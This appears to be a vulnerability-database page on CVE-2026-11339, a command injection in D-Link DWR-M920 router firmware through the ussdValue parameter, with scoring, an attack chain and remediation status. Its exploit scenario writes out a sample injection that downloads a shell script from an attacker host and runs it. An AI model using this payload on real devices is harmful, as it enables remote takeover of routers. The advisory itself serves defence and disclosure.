Skip to main content

D-Link DWR-M920 CVE-2026-11339

| EUVD-2026-34859 LOW
Command Injection (CWE-77)
2026-06-05 VulDB GHSA-p9xf-9grr-8jfx
D-Link Command Injection
2.1
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

3
Severity Changed
Jun 05, 2026 - 17:22 NVD
MEDIUM LOW
CVSS changed
Jun 05, 2026 - 17:22 NVD
6.3 (MEDIUM) 2.1 (LOW)
Analysis Generated
Jun 05, 2026 - 17:16 vuln.today

DescriptionCVE.org

A vulnerability was detected in D-Link DWR-M920 up to 1.1.50. The affected element is the function sub_41CF20 of the file /boafrm/formUSSDSetup. The manipulation of the argument ussdValue results in command injection. It is possible to launch the attack remotely. The exploit is now public and may be used.

AnalysisAI

Command injection in D-Link DWR-M920 firmware up to version 1.1.50 allows remote authenticated attackers to execute arbitrary OS commands via the ussdValue parameter of the /boafrm/formUSSDSetup endpoint, processed by the vulnerable sub_41CF20 function without input sanitization. The CVSS vector (AV:N/AC:L/PR:L/UI:N) confirms remote, low-complexity exploitation requiring only low-privilege credentials - a realistic threshold on consumer routers commonly deployed with default or weak passwords. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain low-privilege router credentials via defaults or reuse
Delivery
Authenticate to DWR-M920 web management interface
Exploit
Send crafted POST to /boafrm/formUSSDSetup with malicious ussdValue
Execution
sub_41CF20 passes unsanitized input to system command
Persist
Arbitrary OS commands execute on router
Impact
Attacker achieves persistent access or network interception
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The target must be a D-Link DWR-M920 running firmware version 1.1.50 or earlier. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 6.3 medium score is underpinned by a meaningful set of risk signals: AV:N (network-reachable), AC:L (no special conditions), PR:L (low-privilege authentication required), UI:N (no user interaction), with all three impact dimensions at Low (C:L/I:L/A:L) and unchanged scope (S:U). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with low-privilege credentials on the D-Link DWR-M920 web interface - obtained via default credentials, credential stuffing, or prior reconnaissance - submits a crafted HTTP POST request to `/boafrm/formUSSDSetup` with the `ussdValue` parameter containing shell metacharacters such as `; wget http://attacker.com/shell.sh -O /tmp/s; sh /tmp/s`. The `sub_41CF20` function passes the unsanitized string directly into a system command, causing the injected payload to execute with the web server process's privileges on the router OS. …
Remediation No vendor-released patch has been identified at time of analysis - the CVSS remediation level is undefined (RL:X) and no patched firmware version is referenced in any available source, including the D-Link vendor site (https://www.dlink.com/). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-12174 HIGH POC
7.4 Jun 13

Format string vulnerability in the D-Link DCS-935L 1.10.01 IP camera allows authenticated remote attackers to corrupt me

Share

CVE-2026-11339 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy